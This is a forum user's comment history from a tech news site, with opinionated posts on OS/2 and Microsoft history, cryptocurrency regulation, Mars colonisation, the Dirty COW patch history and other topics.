* Posts by frankvw

20 posts • joined 25 Oct 2016

Chromium-adjacent Otter browser targets OS/2

frankvw
Megaphone

A few more pedantic details

While most of what has been said about how MS never played fair against OS/2 is quite correct, as are the statement about IBMs fragmented management at the time, there's a little more to it than that.

When Windows came into existence, Microsoft had been collaborating with IBM on OS/2 1.x for some time. This collaboration sprung from the insight that with the advent of the 80286 CPU and Intel's plans for the 80386, DOS had essentially become obsolete. IBM worked mainly on the OS/2 kernel, which in its first incarnation was basically a 16-bit successor to DOS with a command line interface. Microsoft concentrated on the Graphic User Interface (GUI).

The idea for a Graphic User Interface was neither new nor original. Years before, Xerox had demonstrated a mouse-controlled GUI in their Palo Alto Research Center. This demonstration featured the Alto computer, which in 1973 sported a GUI, a mouse, graphic WYSIWYG technology and an Ethernet network interface. The demo was attended by Steve Jobs (Apple) and Bill Gates, among others. Jobs saw the possibilities of the GUI and went on to implement the idea into Apple's OS and application software, while Gates decided to stay with the text-based user interface. Later Gates was forced to revise his opinion about the GUI when it turned out to be successful on the Apple platform. Thus it was decided that OS/2 would have a GUI.

Soon Microsoft's code began to diverge from IBM's (especially from Presentation Manager, then IBM's GUI component of OS/2) and became increasingly incompatible with it. Meanwhile Gary Kildall of Digital Research had already released the first version of GEM, a Graphic Environment Manager for DOS. In order to sabotage this, Microsoft announced that they were working on their own, much better, graphic environment. Eventually they took the GUI portion of what should have become OS/2 and sold it as a separate DOS application which they named MS-Windows. In its initial form it was mainly text based and hardly useful, but MS claimed to work on it in preparation for the upcoming OS/2. In the meantime, application developers (e.g. Word Perfect Corp., Ashton-Tate and Lotus) spent huge R&D budgets on rewriting their applications for OS/2, assuming that the IBM/Microsoft partnership would deliver as promised.

MS-Windows could have been a new start, but (mainly for strategic and marketing reasons) it wasn't. It tightly clung to the mistakes of the past, being based upon the underlying MS-DOS architecture for basic OS functions such as file system access. It added a simple cooperative multitasker to MS-DOS, in a manner strangely like that of DesqView (a multitasker for DOS that had been available from Quarterdeck for years). It also sported a GUI that was so close to the one used by Apple that it kept lawyers occupied for over half a decade. But as far as innovation was concerned, that was it.

Initial versions of Windows were very bad, but Microsoft kept promising that a better product would come out Real Soon Now, still as part of their joint OS/2 efforts with IBM. Until one day, that is, when suddenly they turned their backs on OS/2. They cried "innovation" and went back to DOS in spite of earlier having admitted it to be obsolete. Then they went and dropped out of the collaboration with IBM entirely, taking with them a lot of IBM technology that had ended up in Windows, which they now suddenly positioned as the operating system of the future. They never even mentioned their earlier promises about OS/2 again.

Microsoft already sold applications for the Apple Macintosh. This gave them a good look under the hood of Apple's operating system software, and enabled them to muscle Apple into granting them a license for portions of the MacUI. (They threatened to withdraw all Mac applications, unless Apple would grant them a license to use MacUI code to port Macintosh apps to the PC.) They then raided MacUI for extra ideas. The remaining few bits (e.g. the font technology they later called TrueType) they bought, occasionally bartering vaporware that later failed to materialize. They also threw in a random collection of small applications, completely unrelated to an operating system (e.g. Paintbrush) which they had bought from various sources to flesh things out a bit. The resulting mixed bag of bits and pieces was massaged into an end product and released as Windows 3.0.

It was not too difficult for Microsoft to adapt the Apple versions of Word and Excel to run on Windows 3. There is some indication that Windows was adapted to Word and Excel as much as Word and Excel were adapted to Windows. By the time Windows 3.0 hit the market, competing application developers had already put their R&D money into OS/2 versions of their products, on the assumption that OS/2 would be delivered as promised by the IBM/Microsoft partnership. And now OS/2 did not materialize. But a blown R&D budget was only half the problem. Even if most of the application manufacturers had been wealthy enough to fund two separate development efforts to upgrade their DOS products, there was not enough time to do the Windows version before Windows' projected release date. The fact that the Windows API had not been published in any permanent form yet didn't help either. Without a good API specification, an application developer is not able to interface with the operating system or with other software products. This essentially prevents application development. And Microsoft was the only application vendor at the time who knew enough about the Windows API to come up with market-ready Windows applications.

So Microsoft shipped both an OS and an application suite for it, several months before anyone else in the applications market had a chance to catch up with Microsoft's last-moment switch to Windows - and that was that. All those who had expected to sail with the IBM/Microsoft alliance missed the boat, when Microsoft suddenly and deliberately decided to cast off earlier and in another direction than they had originally promised.

Most of the independent application vendors who had committed themselves to OS/2 never recovered.

IBM eventually went on to release their own version of OS/2, and botched its marketing completely with campaigns revolving around dancing elephants and nuns with pagers. This is partially due to the fact that by the time OS/2 hit the market, that market had already been taken away from them by Microsoft, and IBM never fully realized the extent of the changes that had been wrought upon the market while they weren't looking. Most application developers had irrevocably committed themselves to Windows at that point, and application developers now used Windows development tools which produced code that was extremely hard to port to another OS. Native OS/2 application software remained scarce, and hardware support was even a bigger problem. As a result, most OS/2 users first tried to run Windows applications on OS/2, which often came with quite a few hurdles and problems.

Even so, IBM remains responsible for much of the demise of OS/2. Although it had an infinitely better architecture than Windows, OS/2 was killed off by some of the worst strategic and marketing decisions in the history of the industry. Its brief and unhappy existence was marked by a lack of drivers and hardware support, a lack of development tools, and a lack of native applications. In typical IBM fashion the end user was expected to manually edit a lengthy CONFIG.SYS file (four pages or more of text-based and cryptic configuration items) to configure the system. Partnerships with hardware vendors to ship OS/2 with systems that couldn't run it properly made the problem even worse, and disastrously bad marketing drove the final nail into OS/2's coffin.

After this debacle IBM withdrew from the desktop software market which they had never really understood, in spite of having created the original IBM PC.

India's Reserve Bank deputy governor calls for crypto ban

frankvw

Re: "They fear it because they can't control it. They hate us for our freedom"

I hear that a lot: the idea that cryptocurrency has Big Government (and Big Finance) crapping their pants because it takes away their power over the oppressed masses. Just like with any other conspirationist drivel there is a tiny grain of truth here: cryptocurrency is indeed not controlled by a central authority. In this respect it's a lot like the old American wild west: one great big free-for-all. There's plenty of freedom for everyone to do whatever they want, but the downside of that is also that it is also a fertile breeding ground for lawlessness. There are good reasons why crypto has a bad rap as being the tool of choice for scammers, terrorists and other criminals: it is ideally suitable for their purposes, so of course it does get used for those purposes. A lot.

Crypto's lack of regulation is a two-edged sword: it allows total freedom, but that includes the freedom for it to be used for crime with impunity. In practice, "unregulated" quite often means "lawless" and that goes for crypto, too. And it shows.

Just like the old wild west, crypto will eventually lose its unregulated character when (not if) the disadvantages of lawlessness will begin to outweigh the advantages of non-regulation. When that happens the question is what raison d'etre crypto will have left.

Meanwhile crypto is here, and both banks and governments are trying to deal with that fact as well as possible. Pointing out its disadvantages and making a point for its disuse is not to be taken as a sign of fear or envy. Both scammers and conspiracy nuts would have you believe that, but that doesn't make it true.

BOFH: They say you either love it or you hate it. We can confirm you're going to hate it

frankvw

Deja vu!

This reminds me of 1996, when I was working as a contractor for a large telco. The "Security Manager" (read: an utterly useless bloke they couldn't get rid of and who was therefore parked in a made-up function) decided to email the entire company, all 3,500 or so employees, about the dangers of MS Word macro viruses. Remember, this was when Windows 95 and Office were just taking over the desktop, and Outlook was still fairly new to most people, including our Security Damager. So what did he do? He typed it up in Word and then used Word's "send document as email" function to distribute it to the masses, not realizing, of course, that this would send everyone an email with his Word file attached.

You can probably guess what happened next.

Fortunately at the networking department we ran Solaris on our workstations rather than M$ rubbish, so our little enclave remained unaffected (and uninfected), as opposed to the rest of the 3,500+ staff were less lucky. I remember that episode as a very, very long weekend.

Chinese chip designers hope to topple Arm's Cortex-A76 with XiangShan RISC-V design

frankvw
Big Brother

Cue US concerns about the embedded spy code in these chips and a subsequent embargo in three, two, one...

BOFH: When the Sun rises in the West and sets in the East, only then will the UPS cease to supply uninterrupted voltage

frankvw
Flame

As a fellow anonymous South African coward, I'm surprised you didn't note the above remarks about the virtues of running vital equipment at 100+% capacity indefinitely and what that has done to our national power grid.

So at the pub have one for me, provided loadshedding or unscheduled power failures don't get in the way...

The silicon supply chain crunch is worrying. Now comes a critical concern: A coffee shortage

frankvw

Meh. I have been roasting my own coffee beans (which is ridiculously easy) for years. Buying green beans in bulk (10-15kg or so) means you end up paying about 1/3 of the going retail price, and the latter is for bog standard coffee, not single origin gourmet quality, which is essentially what fresh home roasted coffee is. Green beans, when properly packaged and stored, have a shelf life of at least 2 years. So I've got the better part of 25 kg in stock and I'm ready for Armageddon. (And I'm not even mentioning home brewed beer and home distilled hooch here.)

Time to become more self-sufficient, people!

It only took four years and thousands of complaints but ICANN finally kills off rogue Indian domain registrar

frankvw
Facepalm

Re: Between this and Nominet...

The problem is not DNS itself. The problem is the bureaucratic organization that oversees the (mis)management of the administrative side of domain name registration and allows the registries to be mucked up either deliberately or out of incompetence. Trying to fix this problem by overhauling the DNS system is trying to fix Boris Johnson by overhauling democracy.

How the US attacked Huawei: Former CEO of DocuSign and Ariba turned diplomat Keith Krach tells his tale

frankvw

Meanwhile, in the rest of the world...

While Huawei may or may not be Pure Evil and bound on world domination by using all our precious private data, let's not forget the other baddies out there. The Mossad, for example, has fingers in many pies and backdoors in many data centres through "confidential" agreements with various governments who should know better. While Israel is the only one I have first hand information about, I'm sure there are more.

The reality of the situation is that the West seems to need an enemy. It used to be the Russians, but now the cold was is essentially over and they have ceased to be our favourite threat, China has been promote to fill that role. Once they turn out not to live up to our expectations of being horrible, something else will be chosen to fill the niche. A conglomerate of all Islamic countries, perhaps, or maybe the French, who knows...

Considering the colonisation of Mars? Werner Herzog would like a word

frankvw

Re: Where's the money?

"Profitable? It most certainly has the same mineral resources Earth has,"

Exactly my point. The same stuff as we have here does not cover the cost of going to Mars for it.

"so if there is enough water,"

Which remains to be seen.

"Mars could be easily self-sustaining."

Possibly, yes. But you're missing the point: colonizing Mars would take a huge investment with near-zero returns. Granted, the spinoff in the form of developed technology will indirectly benefit us all. But that's not the way investors and taxpayers like to see their money being spent.

"It's not a "get rich fast" place, but then again America wasn't either: It was a place of opportunities and potential freedom."

And enough people could afford to get there, paying for the trip out of their own pockets. Let me see you do that on a trip to Mars.

"Besides, don't mix up biological colonization and Colonization as in pith helmets and rifles. There was no real profit in settling in the sub-arctic frozen wastes where nothing grows, scraping a harsh life from hunting and fishing. Yet, humans did it. Living in or near the big deserts isn't fun either, yet humans did it too."

Because they pretty much had to. So yes, when things become so crowded here that we'll have to spill over Mars, we'll re-evaluate.

So it doesn't matter if Mars will never be the green seashore paradise one would dream of, it remains a place where humans can potentially live. Life will be difficult, but not more difficult than life was back then for those people who colonized inhospitable regions of Earth.

frankvw
Facepalm

Where's the money?

Exploration has always been driven by Man's insatiable curiosity, need for expansion and investigation. Colonization, on the other hand, has always been driven by profit and nothing else. America was settled because it was a land of huge resources and settlers could build a better life there than in their countries of origin. The "scramble for Africa" was driven solely by a desire to exploit the resources found there. And so on.

Mars, on the other hand, has little profitable resources to offer. Yes, Man could conceivably eke out an existence there somehow, but what would pay for the huge investments required for such an undertaking? It's a desert. There's all the dust, sand and rocks you could want, and a little water ice as well (but not too much) but that's it.

Forget the very real problems of terraforming Mars. What will really make sure Mars will never be colonized (barring a single, small scientific outpost perhaps, which is NOT colonisation) is the simple fact that there's no profit to be made on such a venture. The cost of lifting anything to Mars are so great that you would need to find something like Unobtanium on Mars to make it worth it.

The moon suffers from similar problems, although to a far lesser degree; it's closer and therefore cheaper to reach, and Helium-3 might (!) be the bonanza that could potentially make it worth it. But what profitable commodities does Mars have to offer to cover the costs of colonization, exploitation and transportation, AND make a profit on top of that? If there is one, I can't see it.

Whoa, humans have been hanging out and doing science stuff in freaking space aboard the ISS for 20 years

frankvw

Re: Tow it out to the moon...

Getting ISS up to escape velocity without breaking it up and then decelerating it into a lunar orbit is going to be more complicated than building it on-site. Still, kudos for thinking out of the box. :)

BOFH: Rome, I have been thy soldier 40 years... give me a staff of honour for mine age

frankvw
Holmes

Titus Andronicus, no less

So good to see that the BOFH knows his classics!

Forget Terminators, says US military, the next-gen AI battles will hinge upon net infrastructure, not killer robots

frankvw
Mushroom

They do have a point, though

All the above comments notwithstanding, there is one very real aspect that everyone seems to forget: warfare is 10% fighting and 90% logistics.

Look at WWII: by wiping out one single ballbearing factory the allied forces set the Reich back further than ten D-days ever could have done. And D-day was a an exercise in logistics. By harming the enemy's logistics (which let's face it, is entirely IT based) one can do more damage with less risk of repercussions, loss of friendly lives and materiel expenditures than with a platoon of high tech droids.

The same goes for intelligence operations: ensuring proper intelligence and, if at all possible, feeding the enemy misinformation, is vital to any sort of warfare, not only in modern terms but throughout history.

So yes, there is a point to all this.

Icon selected for appropriateness.

Physical locks are less hackable than digital locks, right? Maybe not: Boffins break in with a microphone

frankvw

Opening a mechanical lock by recording its sound and translating that into a duplicate key (no doubt 3D printed)... I wonder when that's going to show up at CSI or one of the spin-offs. I give it a few months on the outside.

From 'Queen of the Skies' to Queen of the Scrapheap: British Airways chops 747 fleet as folk stay at home

frankvw

Contrary to previous commenters, I've always like the 747. I've spent more time on it as a passenger than on all other aircraft combined (although I haven't flown as much in the past decade as I did prior to that) and for some reason I remember my flights on a 747 as more comfortable. Not sure if it was the way the aircraft handled (it always seemed more... well, stable, somehow, than more recent designs) and the seats never left me quite as wrecked after a 10+ hour flight than what I experienced on Airbuses and the like. I'll miss the 747.

The longest card game in the world: Microsoft Solitaire is 30

frankvw

But still...

I have never been a MICROS~1 fan, and to say something positive about them here is like blaspheming in church, but in the interest of balance I'm going to have to: including Solitaire in Windows was a good move. It was intended as a tool to introduce technophobic noobs to working with a computer with a GUI and a mouse, and I have used it successfully for that purpose many times during my dark days of staff training and support. It did what it was designed to do and performed a useful function, which is more than can be said for many other Windows features.

And as MS apps go, Solitaire has always been reasonably well behaved. I know it has the reputation of being to productivity what a black hole is to light, but the various problems associated with any other MICROS~1 products over the years amount to a far greater productivity loss than poor Solitaire ever could hope to achieve; not in the last place because those who play it during working hours would otherwise be prone to other forms of wasting time anyway. It's the worker's attitude, not the handy temptation of an on-screen card game, that is the leading cause of non-productivity.

In short, Solitaire has helped more noobs overcome their techo/computer/Windows phobia than it has turned good office workers into bad time wasters.

The iMac at 22: How the computer 'too odd to succeed' changed everything ... for Apple, at least

frankvw

Reading the comments, I don't see the biggest advantage of the iMac: it had no floppy drive.

Having been a sysadmin in education, I can reliably report that floppy drives in a classroom (and, to a lesser degree in a corporate environment) are a pain and serve no good purpose. They serve as an unmonitored point of ingress for pirated software and malware and potential egress of confidential information; they collect dust and other contaminants and are prone to failure.

Then along came the iMac, which moved a lot of the work-station-based need for system administration to a network-central approach and, with a generic hard drive image, reduced the computer essentially to an appliance that could be swapped out for another one in case of problems. Sysadmins worldwide heaved sighs of relief.

ESA toasts 10% budget boost by stretching ISS support out to 2030

frankvw
Facepalm

Whacknut jobs? Maybe not..

Granted, Musk and Bezos and the rest of that lot belong to a particular species of eccentrics. But for good reason: to achieve what they have, you have to be!

Musk especially is a good example. SpaceX has achieved things in 17 years that NASA (and Boing!) are still not capable of, in spite of having been in the game for more than half a century and having been allocated budgets with many more zeroes than what SpaceX has to play with.

You can't do all that unless you have an ego the size of Jupiter.

So yes, he's a little weird. But he's been successful because of it, not in spite of it.

Space-wrecks: Elon's prototype Moon ferry Starship blows its top during fuel tank test

frankvw
Pint

This is what tests are for

It's called rocket science for a reason.

As I recall, the US Air Force in the 1950s had a good number of spectacular launch failures while developing rockets before they managed to get one off the pad in once piece. (Not counting the German NAZI rockets they'd carted out of Peenemunde in '45, of course.) If it hadn't been for the cold war and the need to get spy sats over Russia the boffins probably never would have stuck with it. And later rocketry wasn't without its problems, either. Think Apollo 1 and two lost Space Shuttles... Or the Russian space program's encounters with failed descent parachutes, explosive decompression and goodly number of explosions on the pad as well. So I'm all for testing the heck out of everything, and I'm not even expecting to ever fly in one of these things.

This is how technology gets developed. You do the best you know how; you test; you fail; you change what you borked and you test again. If everyone knew how to get it 100% right the first time... Well, where's the fun in that?

So here's a pint raised to the guys who test stuff!

Dirty COW explained: Get a moooo-ve on and patch Linux root hole

frankvw
Angel

Re: The very definition of technical debt

"390's must be way way way less than 5% of the linux base in terms of user numbers or cpu counts... Way way way less."

That is not the point. When this bug was unfixed, it was because at that moment in time it was simply unacceptable to just break Linux on S/390. Commit f33ea7f404e5, more than a decade ago, posed a simple question: Do we live with a vulnerability that at this point in time is a minor and obscure one, or do we break Linux on a type of host that is usually deployed in response to high-reliability and high-availability requirements? The answer to which would be "Duh", AFAIC.

That said, this could have been better documented at the time and perhaps fixed before it became a high-profile issue. That said, we now all know what happened, why and how it happened, and what was done to adequately fixed it. Which is the proper way to deal with this.

SUBSCRIBE TO OUR WEEKLY TECH NEWSLETTER

Biting the hand that feeds IT © 1998–2022